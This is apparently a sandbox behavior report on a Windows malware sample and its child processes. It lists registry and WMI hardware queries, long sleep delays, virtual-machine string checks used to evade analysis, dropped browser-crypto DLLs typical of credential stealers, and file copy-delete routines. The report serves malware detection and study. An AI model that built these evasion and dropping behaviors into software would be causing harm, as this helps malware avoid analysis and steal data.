                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-80891
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 26F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 15E0000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 33A0000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1800000 memory reserve | memory write watch
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5269Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4126Jump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-39246
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bxhlahunbhcJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\osssciedmedJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u3bs.2\relay.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeAPI coverage: 9.8 %
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeAPI coverage: 6.2 %
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeAPI coverage: 2.4 %
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -30265s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772Thread sleep time: -59883s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -37036s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772Thread sleep time: -59772s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -47193s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5772Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -39525s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -37399s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -50848s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -45672s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -55665s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -31071s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -46697s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -55131s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -49527s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -32019s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -54341s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -45828s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -55517s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -42184s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -51948s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -30066s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -41649s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -32091s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -56111s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -40617s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -38991s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -31463s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -48355s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -59245s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -55162s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -40699s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -38605s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -59303s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -45251s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -32359s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -37201s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -33049s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -33372s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -30615s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -52558s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -38527s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -46473s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -42320s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -53255s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -58861s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -56561s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -47964s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -58959s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -32692s >= -30000sJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 864Thread sleep time: -58504s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00412570
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040D1C0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004015C0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411650
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040B610
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040DB60
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00411B80
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D540
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_004121F0
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00401120 GetSystemInfo,ExitProcess,1_2_00401120
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30265Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59883Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37036Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59772Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47193Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39525Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37399Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50848Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45672Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55665Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31071Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46697Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55131Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49527Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32019Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54341Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45828Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55517Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 42184Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51948Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30066Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41649Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32091Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56111Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40617Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38991Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31463Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48355Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59245Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55162Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40699Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38605Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59303Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45251Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32359Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37201Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33049Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33372Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30615Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 52558Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38527Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46473Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 42320Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53255Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58861Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56561Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47964Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58959Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32692Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58504Jump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeJump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Users\user\AppData\Local\Temp\u3bs.2Jump to behavior
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Microsoft Hyper-V Server
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Datacenter without Hyper-V Core
                              Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                              Source: cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: QEMU_HARDU
